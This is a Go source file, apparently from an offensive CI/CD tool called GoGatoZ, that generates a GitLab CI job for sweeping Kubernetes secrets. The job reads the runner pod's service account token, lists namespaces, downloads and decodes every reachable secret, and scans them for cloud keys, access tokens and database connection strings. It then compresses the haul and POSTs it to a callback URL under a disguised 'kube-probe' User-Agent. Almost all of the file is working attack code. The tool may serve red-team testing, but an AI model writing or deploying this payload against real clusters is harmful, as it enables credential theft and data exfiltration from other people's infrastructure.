package payloads

import (
	"fmt"
	"strings"
)

// K8sSecretsOptions configures a payload that sweeps Kubernetes secrets from
// a CI runner pod's service account. Exploits the common misconfiguration
// where GitLab CI runners execute in Kubernetes with overly permissive RBAC
// roles, granting the pod's service account access to secrets across
// namespaces.
//
// Attack vectors:
// 1. Service account token at /var/run/secrets/kubernetes.io/serviceaccount/token
// 2. Kubernetes API auto-discovered via KUBERNETES_SERVICE_HOST
// 3. RBAC misconfig allowing list/get secrets across namespaces
// 4. Base64-decoded secret data scanned for credential patterns
type K8sSecretsOptions struct {
	Common      CommonOptions
	Namespaces  []string // specific namespaces to target (empty = discover all)
	CallbackURL string   // HTTP endpoint to POST compressed results to
}

// GenerateK8sSecretsYAML returns a GitLab CI job that sweeps Kubernetes secrets.
func GenerateK8sSecretsYAML(o K8sSecretsOptions) string {
	name, stage := o.Common.defaults("k8s-secrets")

	script := indentScript(buildK8sSecretsScript(o), "      ")

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (K8s Secret Sweep)
# Sweeps Kubernetes secrets via runner pod service account
# Targets: GitLab CI runners on Kubernetes with broad RBAC
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
%s
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), script, rulesManual(o.Common.Manual))
}

func buildK8sSecretsScript(o K8sSecretsOptions) string {
	var b strings.Builder

	callbackURL := strings.TrimSpace(o.CallbackURL)

	b.WriteString(`
_K8S_SWEEP() {
  _sdir=$(mktemp -d)
  echo "[*] Kubernetes secret sweep starting..."

  # Step 1: Read service account credentials
  SA_TOKEN_PATH="/var/run/secrets/kubernetes.io/serviceaccount/token"
  SA_NS_PATH="/var/run/secrets/kubernetes.io/serviceaccount/namespace"
  SA_CA_PATH="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"

  if [ ! -f "$SA_TOKEN_PATH" ]; then
    echo "[-] No service account token found — not running in Kubernetes"
    rm -rf "$_sdir"
    return 0
  fi

  SA_TOKEN=$(cat "$SA_TOKEN_PATH")
  SA_NS=$(cat "$SA_NS_PATH" 2>/dev/null || echo "default")
  echo "[+] Service account token loaded (namespace: $SA_NS)"

  # Step 2: Detect Kubernetes API endpoint
  if [ -z "$KUBERNETES_SERVICE_HOST" ]; then
    echo "[-] KUBERNETES_SERVICE_HOST not set — cannot reach API"
    rm -rf "$_sdir"
    return 0
  fi

  K8S_PORT="${KUBERNETES_SERVICE_PORT:-443}"
  K8S_API="https://${KUBERNETES_SERVICE_HOST}:${K8S_PORT}"
  echo "[+] Kubernetes API: $K8S_API"

  # Helper: authenticated curl against K8s API
  _k8s_get() {
    curl -sS --cacert "$SA_CA_PATH" \
      -H "Authorization: Bearer $SA_TOKEN" \
      -H "Accept: application/json" \
      "$K8S_API$1" 2>/dev/null
  }

`)

	// Step 3: Namespace discovery or use provided list
	if len(o.Namespaces) > 0 {
		quoted := make([]string, 0, len(o.Namespaces))
		for _, ns := range o.Namespaces {
			ns = strings.TrimSpace(ns)
			if ns != "" {
				quoted = append(quoted, ns)
			}
		}
		fmt.Fprintf(&b,`  # Step 3: Target specific namespaces
  NAMESPACES="%s"
  echo "[*] Targeting namespaces: $NAMESPACES"

`, strings.Join(quoted, " "))
	} else {
		b.WriteString(`  # Step 3: Discover all accessible namespaces
  echo "[*] Enumerating namespaces via /api/v1/namespaces..."
  NS_JSON=$(_k8s_get "/api/v1/namespaces")
  NAMESPACES=$(echo "$NS_JSON" | grep -o '"name":"[^"]*"' | sed 's/"name":"//;s/"//' | sort -u)
  if [ -z "$NAMESPACES" ]; then
    echo "[!] Cannot list namespaces — falling back to pod namespace"
    NAMESPACES="$SA_NS"
  fi
  NS_COUNT=$(echo "$NAMESPACES" | wc -w)
  echo "[+] Found $NS_COUNT namespace(s)"

`)
	}

	// Step 4: Sweep secrets per namespace
	b.WriteString(`  # Step 4: Sweep secrets per namespace
  _total=0
  _creds=0
  for ns in $NAMESPACES; do
    echo "[*] Querying secrets in namespace: $ns"
    SECRETS_JSON=$(_k8s_get "/api/v1/namespaces/$ns/secrets")

    # Check for access denied
    if echo "$SECRETS_JSON" | grep -q '"code":403'; then
      echo "[-] Access denied for namespace: $ns"
      continue
    fi

    # Extract secret names
    SECRET_NAMES=$(echo "$SECRETS_JSON" | grep -o '"name":"[^"]*"' | sed 's/"name":"//;s/"//' | sort -u)
    if [ -z "$SECRET_NAMES" ]; then
      echo "[-] No secrets found in namespace: $ns"
      continue
    fi

    SEC_COUNT=$(echo "$SECRET_NAMES" | wc -w)
    echo "[+] Found $SEC_COUNT secret(s) in $ns"
    _total=$((_total + SEC_COUNT))

    mkdir -p "$_sdir/secrets/$ns"

    # Fetch each secret and decode data values
    for sec_name in $SECRET_NAMES; do
      SEC_JSON=$(_k8s_get "/api/v1/namespaces/$ns/secrets/$sec_name")
      echo "$SEC_JSON" > "$_sdir/secrets/$ns/${sec_name}.json"

      # Extract and base64-decode data fields
      echo "$SEC_JSON" | grep -o '"[^"]*":"[A-Za-z0-9+/=]*"' | while IFS=: read -r key val; do
        key=$(echo "$key" | tr -d '"')
        val=$(echo "$val" | tr -d '"')
        decoded=$(echo "$val" | base64 -d 2>/dev/null || true)
        if [ -n "$decoded" ]; then
          echo "$ns/$sec_name/$key: $decoded" >> "$_sdir/decoded_secrets.txt"
        fi
      done
    done
  done

  echo "[+] Total secrets collected: $_total"

`)

	// Step 5: Credential pattern scanning
	b.WriteString(`  # Step 5: Scan decoded secrets for credential patterns
  if [ -f "$_sdir/decoded_secrets.txt" ]; then
    echo "[*] Scanning for credential patterns..."
    while IFS= read -r line; do
      matched=false
      # AWS access keys
      if echo "$line" | grep -qE 'AKIA[0-9A-Z]{16}'; then
        echo "[CRED] AWS Access Key: $line" >> "$_sdir/credentials.txt"
        matched=true
      fi
      # GitHub tokens
      if echo "$line" | grep -qE 'ghp_[A-Za-z0-9]{36}'; then
        echo "[CRED] GitHub PAT: $line" >> "$_sdir/credentials.txt"
        matched=true
      fi
      # GitLab tokens
      if echo "$line" | grep -qE 'glpat-[A-Za-z0-9_-]{20}'; then
        echo "[CRED] GitLab PAT: $line" >> "$_sdir/credentials.txt"
        matched=true
      fi
      # Connection strings (postgres, mysql, mongodb)
      if echo "$line" | grep -qEi '(postgres|mysql|mongodb|redis|amqp)://[^ ]+'; then
        echo "[CRED] Connection String: $line" >> "$_sdir/credentials.txt"
        matched=true
      fi
      # Generic password/secret/token keys
      if echo "$line" | grep -qEi '(password|secret|token|api_key|apikey|private_key)'; then
        if [ "$matched" = false ]; then
          echo "[CRED] Sensitive Key: $line" >> "$_sdir/credentials.txt"
        fi
      fi
    done < "$_sdir/decoded_secrets.txt"

    if [ -f "$_sdir/credentials.txt" ]; then
      _creds=$(wc -l < "$_sdir/credentials.txt")
      echo "[+] Found $_creds credential pattern match(es)"
    else
      echo "[-] No credential patterns matched"
    fi
  fi

`)

	// Step 6: Compress and exfiltrate
	b.WriteString(`  # Step 6: Compress collected data
  echo "[*] Compressing collected secrets..."
  tar czf "$_sdir/k8s_secrets.tgz" -C "$_sdir" secrets/ decoded_secrets.txt credentials.txt 2>/dev/null || \
    tar czf "$_sdir/k8s_secrets.tgz" -C "$_sdir" secrets/ 2>/dev/null || true

`)

	if callbackURL != "" {
		fmt.Fprintf(&b,`  # Step 7: Exfiltrate via HTTP callback
  echo "[*] Exfiltrating to callback..."
  curl -sS -X POST \
    -H "Content-Type: application/octet-stream" \
    -H "User-Agent: kube-probe/1.28" \
    --data-binary @"$_sdir/k8s_secrets.tgz" \
    "%s" >/dev/null 2>&1 || true

`, callbackURL)
	} else {
		b.WriteString(`  # Step 7: Store as artifact (no callback URL specified)
  if [ -f "$_sdir/k8s_secrets.tgz" ]; then
    cp "$_sdir/k8s_secrets.tgz" k8s_secrets.tgz 2>/dev/null || true
    echo "[*] Data saved to k8s_secrets.tgz (artifact mode)"
  fi

`)
	}

	b.WriteString(`  rm -rf "$_sdir"
  echo "[*] Kubernetes secret sweep complete"
}

_K8S_SWEEP
`)

	return b.String()
}
